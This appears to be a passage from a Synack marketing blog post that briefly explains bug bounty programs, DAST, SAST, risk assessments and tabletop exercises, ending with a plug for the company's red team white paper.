Bug bounty programs welcome members of the general public, under well-defined policies, to security test your software themselves and submit bug reports to your company according to the principles of responsible disclosure. If a bug can be proven and fits your company’s criteria for a prioritized vulnerability, the bug hunter could be awarded a monetary prize of anywhere from $50 to $100,500, but typical bug bounty rewards are about $200 to $1,000. The amount of money awarded for a valuable bug report is affected by several factors, including the size of the company’s budget and user base and the criticality of the bug.

Dynamic Application Security Testing (DAST) is an automated technique, but it is exclusively for testing running applications, so it’s often a tool used by application developers. DAST is used most often for web applications, but other internet-connected applications can be tested this way too. The targeted application must be running, such as a web application deployed on the internet. The exploits that are executed are dynamic, so they may alter course depending on how far the test has penetrated.

Risk assessments are sometimes called threat evaluations. In a risk assessment, your security team combines what it knows about your organization’s data assets with how those assets could be threatened, both by cyber attack and by non-malicious threats such as natural disasters and accidents. Risks are identified, estimated and prioritized according to their probability of occurring and the amount of harm that could result.

Static Application Security Testing (SAST) has the same goals as DAST, but it examines application source code before it is compiled, not applications running in production. If a vulnerability is clear from the source code – and not all are – it can be detected by SAST.

Tabletop exercises are mainly for incident response teams, a defensive security function. They can be a fun challenge when done well, and help your incident response group face cyber threats with greater confidence. Specific attacks are proposed in the exercise, and the team needs to figure out how they should prevent, mitigate, or contain the cyber threat. If Capture The Flag is the main educational game for the red team, tabletop is the main educational game for the blue team. The output is a more confident and prepared team. Sometimes, refinements for an organization’s threat modeling also emerge. But actual vulnerabilities will not often be found during these exercises.

These and other newer technologies (artificial intelligence and machine learning in particular) are useful tools for security leaders. Computer software acts faster and doesn’t get tired, but the most flexible thinking comes directly from human beings. 

Computer scientists know that computers can only simulate randomness; it takes a living being to actually be random. And human pentesters, like the Synack Red Team, are the best at simulating human cyber attackers and the serious exploits they regularly find.

For a deeper look at the Synack Red Team and its diverse skill set, read our latest white paper, “Solving the Cyber Talent Gap with Diverse Expertise.”
